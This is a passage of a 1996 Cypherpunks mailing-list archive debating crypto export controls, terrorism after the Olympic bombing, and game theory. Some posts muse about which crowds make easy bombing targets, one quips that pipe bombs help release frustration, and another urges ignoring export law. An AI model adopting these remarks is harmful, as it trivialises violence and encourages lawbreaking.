>    have been clamoring for the right to encrypt as securely as 
>    possible, Mr. Freeh and others argue, "the genie is not yet 
>    out of the bottle" on "robust," meaning uncrackable, 
>    encryption. 

Are they going to magically erase all copies of strong software that 
is already currently available? (Side note: the Pacifica news report 
on Friday notes that while Freeh gave his testimony, over 100 copies 
of PGP were downloaded from MIT's site.)

[..]
>    Encryption, if widely used, could conceivably ease some 
>    privacy problems concerning who gets to see personal and 
>    financial data on individuals -- though such data usually 
>    are vulnerable to being dug out of storage rather than 
>    intercepted in transmission. But neither is it clear that 

And evidence cannot be encrypted.  You cannot encrypt an airplane 
full of cocaine or an unusually expensive car baught by money from 
drugs, espionage, etc.  Nor can you encrypt bomb-making materials, 
nor conversations in a room (from your mouth to a telephone 
receiver).  Nor will encryption do anything about informants inside 
the communications loop. etc. etc....

>    the encryption enthusiasts' desire for free development 
>    should take precedence over the tracking of terrorism. At 

It's not clear that terrorism can be tracked, even if it's unencrypted.
The OK and WTC bombings were apparently not encrypted, and there's 
some allegations that the authorities had advanced warnings of the 
latter.

>    the very least, Congress should be exceedingly cautious 
>    about getting out ahead of administration concerns on 
>    controls that, once lifted, are hardly reversible. 

The controls haven't done much to prevent free software from being 
exported.  They only control commercial sales of software (and 
hardware).

Particularly absent in the WaPo-ed is that many do not trust the 
authorities (in the US and elsewhere)--particularly the FBI, which
has a long history of extra-legal surveillance.

Rob
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Sun, 28 Jul 1996 17:31:11 +0800
To: alano@teleport.com>
Subject: Re: Fireworks expected, missed at Senate crypto hearing
In-Reply-To: <2.2.32.19960727172611.00e106c8@mail.teleport.com>
Message-ID: <glyjtH200YUw0hJfk0@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 27-Jul-96 Re: Fireworks expected,
mis.. by Alan Olsen@teleport.com 
> Gordon was the CO-SPONSOR of the CDA.  Exon got all the press, but Gordon
> was just as responsible.  (Maybe the netfolk ought to make that fact well
> known when he comes up for re-election. Hint! Hint!)

Speaking of CDAesque legislation and elections, remember that Bob Dole
cosponsored the Grassley bill, which was even worse than Exon's
brainchild...

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Sun, 28 Jul 1996 17:35:40 +0800
To: minow@apple.com>
Subject: Re: Is Colossus out of date?
In-Reply-To: <v03007807ae203e6acd07@[17.219.102.4]>
Message-ID: <klyk0RW00YUw0hJUg0@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 27-Jul-96 Is Colossus out of date?
by Martin Minow@apple.com 
> You may recall recent comments by Attorney General Janet Reno where
> she notes that exportable encryption cannot be broken in reasonable
> time by modern supercomputers.

Freeh stressed the same point on Thursday. This info was on a sheet of
paper that looked like a DoJ form, though I couldn't get close enough to
read it.

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 28 Jul 1996 03:19:25 +0800
To: <cypherpunks@toad.com
Subject: Re: Pie cutting algorithm
Message-ID: <ae1f9db30b0210044d00@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:40 AM 7/27/96, Rollo Silver wrote:
>Tim May said:
><< ObCrypto Sidebar: The "fair" method for dividing a pie between two people

>I (RS) believe Claude Shannon proposed the following N-person pie-cutting
>algorithm more than 25 years ago:

Thanks!  I should've suspected that The Master had worked on this problem.


>Tim May: as a Licensed Ontologist, do you know who made the wiseassed (but
>deep) remark "Ontology recapitulates Philology"? or for that matter,
>"Oncology recapitulates Proctology".

No, but my friend Chip Morningstar pointed out that "ontology recapitulates
philately,"

(For those befuddled by these jokes, the biological original was "ontogeny
recapitulates phylogeny," which means that the morphological development of
a fetus in the womb retraces, or recapitulates, the morphological
development throughout history of the species, roughly. Thus, gills, fins,
etc.)

--Tim

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 28 Jul 1996 03:21:39 +0800
To: cypherpunks@toad.com
Subject: Re: The Four Horsemen Go to the Olympics!
Message-ID: <ae1f9f020c0210049b8a@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:32 PM 7/27/96, Nathan Syfrig wrote:

>This is very worrysome, as it truly is a "world stage" event that could
>really serve to galvanize various governments into uniting against strong
>non-escrowed crypto.  Hey, it will look good for the international PR,
>never mind the fact that not everybody will be so 'diligent' in registering
>their keys and/or use the "approved" crypto.

Well, the large crowds milling in public squares with massive numbers of
world journalists watching...a classic series of "soft targets."

If several million-dollar bomb sniffers are placed in all airports, the
terrs will just shift to _trains_, as experts point out. Or _ships_. Or
_crowds_. Next time you're out driving around, think of places where a car
bomb could take out dozens of people, or where a bag or backpack could take
out crowds.

(The Mad Bomber in New York or Boston killed quite a few people by using
lockers in public places....kind of hard to put bomb sniffers in all such
places. And bomb technology, timers, detonators, etc. have advanced apace
in the last several decades since the Mad Bomber.)

While I don't claim there is nothing to be done about terrorism, the fact
is that modern nations highly value free travel and often mingle in "soft
target" areas. Even a police state wherein people's movements are carefully
controlled cannot fully avoid such acts.

By the way, the airline solution is not too difficult to visualize:

1. Eliminate checked baggage, or at least require those with checked
baggage to deposit it enough hours in advance to be inspected and to pay
any surcharges for this inspection. (I try to only have carry-on baggage,
and this seems to be a major trend.)

2. Let the market decide. Airlines could announce their baggage inspection
policy, and customers could decide on the tradeoffs between increased
inspections and higher costs, and greater confidence in security.

I think I'll repost my "Soft Targets" piece of a few weeks ago, in the
light of TWA 800 and this morning's bomb in Atlanta.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 28 Jul 1996 04:01:40 +0800
To: cypherpunks@toad.com
Subject: [REPOST]  The Net and Terrorism
Message-ID: <ae1fa34e0d0210049e15@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


[I sent this out on 29 June 1996. In light of recent events, the comments
about "soft targets" seem worth mentioning again. I doubt my comment, "A
few airliners will shot down by Soviet surface-to-air missiles. This is
unsurprising." will get me any visits from the FBI, as this is the
consensus of folks far more expert than I. Likewise, my closing coment,
"avoid crowded downtown areas," was just common sense, not a tip-off to the
Atlanta bombing.]


There have been many recent reports linking the Net and anonymous
remailers, pseudonyms, and (of course) strong crypto to various possible
and actual terrorist events, with an emphasis on the "possible." (If the
Net is linked to _actual_ terrorist incidents, little is being disclosed
publically as of yet.)

Recent comments by John Deutch, William Perry, and Louis Freeh make
reference to the growing danger of the Net. And the "Russian mafia" is
playing a major role in this debate; I won't recap the various articles in
major magazines about arms sales from the former Soviet Army, the reports
that an entire paramilitary unit of the KGB is now working for the Russian
mafia, and the obvious corruption of the entire former Soviet system (I'm
not saying it wasn't corrupt before, just that now the paymasters have
changed).

Can anything be done? To stop the likely effects of lots more
surface-to-air missiles, lots more nerve gas available on the black market,
and so on?

In a word, "no."

I've been thinking about this a lot, reading the various articles, and
pondering the implications. The plain fact is that the modern world is one
of great "liquidity," and the vast amount of arms built up by the U.S.S.R.
(thanks in large part to responding to a similar build-up in the U.S.,
without taking any sides...) are now "leaking out" in increasing numbers.

(The leakage is quite similar to that seen in the 1975-79 period, when
thousands of tons of armaments abandoned by the U.S. in Viet Nam were sold
around the world. Except, of course, that the the Soviet weapons include
some interesting new things.)

Not even a police state can stop armaments from being diverted in
situations such as faced in the former U.S.S.R. (For those not familiar
with the conditions, read up on it. The combination of former command
economy, secret police, selling off of industry to highest bidders, lack of
a conventional industrial base...all of this makes it nearly unavoidable
that much of the former state industry is now controlled by black
marketeers and former Party apparatchniks....after all, who else would have
the money to buy these former State industries?)

In fact, a former police state does not change its stripes. The names and
paymasters change a bit, but the organism lives on. (One need only look at
the police states of Central and South America and their platitudes about
the "Drug War" to understand the realities of such markets.)

Unbreakable crypto will of course be used. This is unsurprising.

A few airliners will shot down by Soviet surface-to-air missiles. This is
unsurprising.

I expect a city or two to get nuked in the next decade or so. (Haifa or Tel
Aviv would be my leading candidates.) To me, this is unsurprising.

My personal solution dovetails with other perceived threat responses: avoid
living in or near major cities and take reasonable measures to cope with
moderate economic or physical crises. (No, I am not a "survivalist," just
mentally and physically prepared to deal with a major earthquake, economic
dislocation, or terrorist incident in San Jose, which is 30 miles north of
me.)

FBI Director Louis Freeh and the TLA spooks are already sounding the alarm
about the "Four Horsemen." Sen. Sam Nunn is calling for measures to ensure
that cyberspace is "secured" and that the Net is not used to further
chemical and biological terrorism.

The point is that even a police state cannot stop the consequences of the
increased "degrees of freedom" the modern world (and the Net) provides. In
fact, police states tend to make the scale of the corruption even greater,
as the Soviet and Latin American examples show. (I could of course get into
the examples of arms dealings in Iran-Contra, the CIA's role in covert arms
supply, etc., but this should be self-evident to all.)

An Australian radio journalist asked me if the Net could make possible new
types of terrorism, and could allow terrorists to plot crimes in new ways.
He seemed surprised when I said "Of course" and then proceeded to give some
examples of how the Net can be used to undermine governments (what those
governments of course refer to as "terrorism," even when it is mostly not).

I'm not advocating such "terrorism," by the way, merely telling it like it is.

Arguing that the Net cannot and will not be used in such ways is naive and
ultimately counterproductive. It is more accurate and useful to point out
that the increased role of terrorism is due to many factors, including
prominently the vast amount of armaments in the world, the role of police
states which have benefitted from these build-ups in the
military-industrial complex, the expansion of "virtual communities" around
the world, and, crucially, the expanded number of degrees of freedom in
transportation, communication, banking, and other such Information Age
channels.

Keep your head down, avoid crowded downtown areas, prepare for moderate
disruptions, and reject arguments that an American Police State will do
anything to stop terrorism.

(Remember, terrorism is just warfare carried on by other means, with
apolgies to Von Clausewitz.)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 28 Jul 1996 05:54:59 +0800
To: cypherpunks@toad.com
Subject: "Soft Targets" as Schelling Points
Message-ID: <ae1fb0ce0f021004c9ff@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



The connection should be clear, but in case it is not: many soft targets
are Schelling points for terrorist actions.

Putting yourself in the mind of a terrorist or militia crazy or whatever,
where would you attack?

The Olympics, obviously. (And security officials of course see the same
Schelling point, hence the unprecedented security measures and presence.)

Given that most Olympic events are well-guarded, etc., what's the next
target to look at? Crowded public gatherings, where the "message" can still
be delivered and where security measures are problematic.

There are tens of thousands of such soft targets/Schelling points in an
"open society," and it is unreasonable to expect to defend each one of
them. (Costly, too.) And if they are so-defended, the attacker moves to
other targets.

Keep your head down.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sun, 28 Jul 1996 20:46:52 +0800
To: cypherpunks@toad.com
Subject: Internet blamed for pipe bombs
Message-ID: <01I7LFRDFCHS9EDGT3@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	I found instructions out of the US for such a while back, which fact
should help in any debates on limiting access to such information in the US.
Also note the attempted link to the War On (some) Drugs.
	-Allen

>Pipe bombs: Easy weapons you can whip up at home

>   _(c) Copyright 1996 Nando.net _
   
>    Sacramento Bee
    
>   SACRAMENTO, Calif. -- It's no wonder curious teenagers, drug dealers
>   looking to intimidate and thousands of others for unknown reasons are
>   building pipe bombs, experts say: The ingredients are at the hardware
>   store and the instructions on the Internet.
   
>   Across the country, latest figures from the U.S. Bureau of Alcohol,
>   Tobacco and Firearms show a 20 percent jump in pipe bomb incidents
>   between 1990 and 1994.

[...]

>   "We've been incredibly busy," said sheriff's bomb technician Judd
>   Holiday. "As crime in other categories is dropping, this is going up."
   
[...]

>   Crude, cheap and surprisingly powerful, pipe bombs are proliferating
>   in part because directions are easy to find on computer networks,
>   experts say. One electronic recipe for a pipe hand grenade ends with
>   the exhortation "Ready to go!"
   
>   "It's all over the Internet," said Peter Urrea, resident agent in
>   charge of the Sacramento office of the federal Bureau of Alcohol,
>   Tobacco and Firearms.
   
>   Pipe bombs are also an increasingly popular tool of intimidation for
>   makers and dealers of the illegal drug methamphetamine, said Holiday.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sun, 28 Jul 1996 21:02:27 +0800
To: cypherpunks@toad.com
Subject: Security debate after Olympics bombing
Message-ID: <01I7LFV08TDW9EDGT3@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	Well, at least some people have the right idea.
	-Allen

>Experts point out differences in Atlanta, TWA incidents

>   _(c) Copyright Nando.net_
   
>    The Associated Press
    
>   WASHINGTON -- With nerves already on edge after the suspicious downing
>   of TWA Flight 800, the bombing at the Olympic Games in Atlanta on
>   Saturday renewed concerns about U.S. safeguards against terrorism.
   
>   But analyses by security experts drew important distinctions between
>   the incidents, and politicians cautioned against measures that would
>   limit liberties.
   
>   Investigators have not officially determined what caused the Flight
>   800 tragedy, but if the jetliner was brought down by terrorists it was
>   a relatively sophisticated operation.
   
>   By comparison, the device in Atlanta was easy to make and detonated in
>   an easily accessible place. "I don't believe that a pipe bomb would
>   have taken down that TWA plane," said a Treasury agent, who requested
   anonymity.
   
>   Another federal investigator noted differences between the Atlanta
>   attack and Middle Eastern terrorists who often use high-powered truck
>   bombs. And domestic militia groups tend to focus on government
>   buildings, not crowds.
   
>   James Alan Fox, the dean of Northeastern University's criminal justice
>   school and a student of criminal behavior, said there are basically
>   two motivations for bombers: revenge and attention.
   
>   "The desire to make a statement can be that of a well-organized
>   terrorist group that uses the victims as pawns to advance their cause,
>   or it could be someone who is just interested in feeling important,"
>   he said.
   
>   Given the recent rise of violent anti-government groups, Fox
>   speculated that a militia sympathizer might use such an event to grab
>   the spotlight.
   
>   "Through an amateurish bombing like this, he can feel like he's part
>   of the movement," Fox said. "He can elevate his sense of importance."
   
[...]
  
>   And building one is almost as simple. "If you don't know how to do it,
>   there are any number of books available ... that will teach you
>   explicitly, step-by-step, how to manufacture the device," Vitch said.
   
[...]

>   House Speaker Newt Gingrich stressed that security was already high at
>   the Olympics, and cautioned against adopting a "police state"
>   mentality.
   
>   "If a terrorist is nutty enough, there's always an opportunity for
>   tragedy," he said, appearing after Nunn on CNN. "A free people can't
>   back down."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charley Sparks <sparks@bah.com>
Date: Sun, 28 Jul 1996 21:10:44 +0800
To: cypherpunks@toad.com
Subject: Public and Private Munitions
Message-ID: <2.2.32.19960728111110.006b97c8@pop1.jmb.bah.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Morning all, I'm only on the second cup.......

- From what I gather, is someone took PGP and ... say Private
Idaho ( examples only, please ) and put then in a cute box with
the instructions printed out and sold it in a store, the
government couldn't control it ? So, why doesn't someone round
up a couple of nice shareware front ends , and the rest of ot,
put it in an envelope and sell it for $5.00 US. The buyer would
then have to pay the shareware fee, and the balance after the
packaging could go into escrow for the legal defense fund of
Cypherpunks or to Phil ?

Another note on GAK

One morning King Arthur and his knights set forth on a quest.
Lancelot, feeling poorly, was left behind. Arthur stopped to see
Lancelot on his way out and entrusted him with the key to
Gwenevere's (sp) chastity belt. ( Lancelot being a true and
faithful knight )  As the band made it's way about a mile from
the castle, a knight happened to see a rider from the castle,
riding for all he was worth. Tha king called a halt to wait for
the rider. It was Lancelot... breathlessly he said to the king,
sire, thou has given me the wrong key.....


Charley
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCXAwUBMftKbOJ+JZd/Y4yVAQE2lAQNEuODwOm97mvJR29D8ONs2T1v5jicT7UI
vBL0rL8WSxCJmeY6ZyOJPI4oS/f1VTdZiMTR48YuQsMZgNWmlPMoW+3mpqvW5lVl
ZTb1eyy2OTk6BHk5h3lKTSxMPVn8shlm3YN5v8H0Qd7WJDBO8Dav2WGlKuaI4Ppp
7b81A1hNKvNOjw==
=ffzw
-----END PGP SIGNATURE-----
Charles E. Sparks<sparks@bah.com>    
In God we trust, all others we encrypt !
http:/www.clark.net/pub/charley/index.htm
    Public Key At 
http://www.clark.net/pub/charley/cp_1.htm





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Schryvers <schryver@radiks.net>
Date: Sun, 28 Jul 1996 23:14:33 +0800
To: Remo Pini <rp@rpini.com>
Subject: Re: "privatizing" phones?
Message-ID: <199607281303.IAA17543@sr.radiks.net>
MIME-Version: 1.0
Content-Type: text/plain


At 12:26 PM 7/28/96 +0200, you wrote:

If its the same standard used in digital cel phones it shouldn't take more
than 30 seconds to figure out the key. 

The standard used in digital cel phones is a 120 bit key
and the crypto is basic xor which is easily broken using basic 
cryptanalysis.

>-----BEGIN PGP SIGNED MESSAGE-----
>
>To: cypherpunks@toad.com
>Date: Sun Jul 28 12:24:57 1996
>> Even if they did change the frequency the call was on, 
>> it would be a simple matter to decode how the frequency
>> change was negotiated, and "follow" the call (also easily
>> accomplished with cellular calls).  Failing that, there is 
>> a very limited range of frequencies allocated for cordless 
>> fones, and simply re-scanning for the conversation is a 
>> trivial inconvenience. //cerridwyn//
>> 
>
>Most of those systems do also change the order of the transmitted data, and 
>that's not limited to a few possibilities. If it's digital, they usually 
>encrypt it (only weak, but hey, you normally have to find the key real 
>time!)
>
>- --------< fate favors the prepared mind >--------
>Remo Pini                            rp@rpini.com
>PGP:  http://www.rpini.com/remopini/rpcrypto.html
>- ------< words are what reality is made of >------
>-----BEGIN PGP SIGNATURE-----
>Version: 2.6.3i
>Charset: noconv
>
>iQEVAwUBMfs/vhFhy5sz+bTpAQEcnwf9G+HAE57+cOydDLAoaetvywK5jFq8IdIW
>POXECrmy53+lTe4n/Z763ytNTUJRYBXcUQrTyg4BiVgDoqt5vm+ZxlPKec64FxME
>a/UM0wpBBANUmgZVWiojtm+lMuxUxfjXbYyV1hRkBfe+gZ0RF00kOhTsWRqEaUTX
>UTpbPalsh+fVtCrhU4lkxk70epu8b6F6SiFw9+awP3mRImlu5SdRBduS6G1yTvSX
>UetAkO60anp6wTIy5s5e+FuWFNmWVqZIGt72fKdqtQshx9xvikzpKGSOExidFTkA
>Z8gWmk1mfU1PiD/8Yfe6VWJdHlFWbqGDGQmRcfwqi5awmDPeNs7arw==
>=4IN4
>-----END PGP SIGNATURE-----
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Mon, 29 Jul 1996 10:27:30 +0800
To: Jeremey Barrett <ichudov@algebra.com>
Subject: Re: Twenty Bank Robbers -- CLARIFICATION
Message-ID: <199607290016.RAA04209@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 04:33 PM 7/25/96 -0700, Jeremey Barrett wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
> Assuming "perfect" intelligence on the part of the robbers (i.e. they will
> follow deterministic behavior and do the "right" thing), then here's what
> must happen IMO (1 being the first guy and 20 being the last):

[...]

> If 2 are left (19 & 20), 19 gets all the money. So 20 will vote for whatever
> 18 says, which MUST include 20 in the deal. 

But here we run into the paradox, that it is not in each persons self
interest to pursue is self interest.

Example;  Suppose only two are left:  Then No. 19 get everything, 
and No. 20 gets nothing.  So if only three are left, it will 
maximize 20's return to vote for a proposal by number 18, that 
number 18 gets 19,999,999 dollars, and number 20 gets one dollar

But suppose that number 20 announces in advance that he considers
an unequal division morally wrong, and will always vote against
any unequal division.  If this threat is credible, which it is,
number 18 will have no choice but to propose an equal split, so
number 20 now gets 6,666,666 dollars, instead of one dollar.

Now if number 20 had threatened to vote against any proposal that
did not split the money equally between himself, and number 18,
thus going for ten million instead of six million, this threat
would be less credible, and he would very likely have wound up
with one dollar.

This is a particular example of the various well known paradoxes
of utilitarianism, that utility is maximized by a firm and credible
promise to utterly disregard utility maximization.



 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Sun, 28 Jul 1996 22:30:49 +0800
To: cypherpunks@toad.com
Subject: Re: Public vs. Private Munitions
Message-ID: <199607281231.IAA64028@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Tim May wrote:

<snip>

>...And the government has no "Sofware Approval Office."

Yet.
JMR

P.S. Today's Dave Barry column is worth reading for a humorous
look at smoking from a libertarian who doesn't agree with Ayn
Rand on the subject.

Regards, Jim Ray -- DNRC Minister of Encryption Advocacy

"It is long past time to end the laughable presumption that voters
 who can easily cope with the choices offered at Burger King are
 somehow 'confused' by more than two choices at the voting booth."
 -- me, in the Miami Herald, June 24, 1996, p. 10A.

 Defeat the Duopoly! Vote "NOTA," not Slick/Dull in November.
 Harry Browne for President. Jo Jorgensen for Vice-president.
 http://www.HarryBrowne96.org/
___________________________________________________________________
PGP id.E9BD6D35 51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8
<mailto:liberty@gate.net> http://www.shopmiami.com/prs/jimray Coming
soon, the "Pennies For Perot" page. Keep billionaires off welfare!
___________________________________________________________________


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh.

iQCVAwUBMftcFG1lp8bpvW01AQF3xwP/aOa2tmp1+oOogdq3a5VNJ3AltT/f9hcD
6z9iTRulIlgLfB56MPZfjY6/hsjL37cwHkPQB2XEuSQxuaRATJrp640yMyHoy7rj
nQdUV5YetkXyS6aLExECMIfAzAPw7rZzhhP5T0ljEHRBnqiZ3uTh6JiGPQZrcDaD
BcVaWfiSxjI=
=gRJg
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Mon, 29 Jul 1996 10:33:25 +0800
To: cypherpunks@toad.com
Subject: Re: Game Theory and its Relevance to Cypherpunks
Message-ID: <199607290016.RAA04220@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


Llywarch Hen wrote:
> > > What Timothy May espouses is not the appearance of craziness but actual
> > > insanity itself.

James A. Donald wrote 
> > if you organize your nuclear forces so that any 
> > serious war is likely to escalate uncontrollably into the battle of 
> > armageddon, regardless of your intentions and desires, which is how 
> > the American government organized its nuclear forces in Europe, 
> > then you can pretty much guarantee you will not have to face a 
> > serious war.

At 03:09 PM 7/27/96 -0700, Jon Leonard wrote:
> This was, of course, the logic behind the alliances before World War I.
> It was obviously suicidal to start a war with any of the major powers,
> but it happened anyway.

Your history is false:  War was romantic and a big vote winner 
before World War I, and after World War I and before world war II 
the "intellectuals" were still big fans of war, just as they are 
still big fans of communism and socialism today, though World
War I was sufficient to kick sense into most normal people.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Mon, 29 Jul 1996 01:43:04 +0800
To: "E. ALLEN SMITH" <cypherpunks@toad.com
Subject: Re: Internet blamed for pipe bombs
Message-ID: <v02120d19ae2131a3ee0b@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:36 7/28/96, E. ALLEN SMITH wrote:

>>   Across the country, latest figures from the U.S. Bureau of Alcohol,
>>   Tobacco and Firearms show a 20 percent jump in pipe bomb incidents
>>   between 1990 and 1994.
>
>[...]
>
>>   "We've been incredibly busy," said sheriff's bomb technician Judd
>>   Holiday. "As crime in other categories is dropping, this is going up."

The friendly Anarchist's Bookstore in San Francisco sells several books on
building bombs. No Internet connection required. I would like offer another
possible explanation for the increase in pipe bombings. The People are
getting frustrated and a pipe bomb can be very useful device releasing
one's frustration.

[No, I do not approve of pipe bombing civilians].



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Mon, 29 Jul 1996 01:32:55 +0800
To: Charley Sparks <cypherpunks@toad.com
Subject: Re: WaPo on Crypto-Genie Terrorism
Message-ID: <v02120d1aae213513bca1@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:35 7/28/96, Charley Sparks wrote:
>I occasionally get invited to teach at a local college.. some students are
>not US. Anyone have any suggestions on a way I can sneek some good privacy
>into the lesson plan.. the course is usually the Internet or networking in
>general.

Ignore ITAR. It is unconstitutional. BTW, independently from what the
Supreme Court may ore may not decide.



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@vail.tivoli.com>
Date: Mon, 29 Jul 1996 00:17:28 +0800
To: Igor Chudov <ichudov@algebra.com>
Subject: Re: Twenty Beautiful Women
In-Reply-To: <199607280248.VAA20048@manifold.algebra.com>
Message-ID: <31FB75D5.7FFF@vail.tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


Igor Chudov @ home wrote:

> Also, I would appreciate if someone specified what exactly the goal
> function is.

Are you wunna them "funny boys"?




[ note clear cp relevance viz. a particular thread I've been nuking lately ]

______c_____________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX    * For the time being,
       m5@tivoli.com * m101@io.com          *    
      <URL:http://www.io.com/~m101>         *    three heads and eight arms.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charley Sparks <sparks@bah.com>
Date: Sun, 28 Jul 1996 23:51:15 +0800
To: cypherpunks@toad.com
Subject: Re: WaPo on Crypto-Genie Terrorism
Message-ID: <2.2.32.19960728133504.006b8dac@pop1.jmb.bah.com>
MIME-Version: 1.0
Content-Type: text/plain


I occasionally get invited to teach at a local college.. some students are
not US. Anyone have any suggestions on a way I can sneek some good privacy
into the lesson plan.. the course is usually the Internet or networking in
general.

Charley


>>snip snip<<
>as things stand now, windoze folks are going to have to  settle with
>Mcro$ofts Access to Keys...MAK or is it Bill's Access to Keys.. BAK in any
>case I didnt want to get into a my pulldownmenu is longer than your
>pulldownmenu argument.. I just want to see it get on the radar fo people
>who code.
>
>You see I dont care what your favorite platform is,( if you like editing in
>VI fine, I personnly like TECO), BUT  I am acting localy, doing my part,
>not just complaining about it... So if you want to help, I am still looking
>for folks to talk... maybe about why crypto is so important.
>Crypto-archarchy. or maybe some e$ stuff would be nice...
>
>
>
>Vinnie Moscaritolo
>------------------
>"friends come and friends go..but enemies accumulate."
>http://www.vmeng.com/vinnie/
>Fingerprint: 4FA3298150E404F2782501876EA2146A
>
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@vail.tivoli.com>
Date: Mon, 29 Jul 1996 00:59:05 +0800
To: Charley Sparks <sparks@bah.com>
Subject: Re: WaPo on Crypto-Genie Terrorism
In-Reply-To: <2.2.32.19960728133504.006b8dac@pop1.jmb.bah.com>
Message-ID: <31FB7D22.2103@vail.tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


Charley Sparks wrote:
> 
> I occasionally get invited to teach at a local college.. some students are
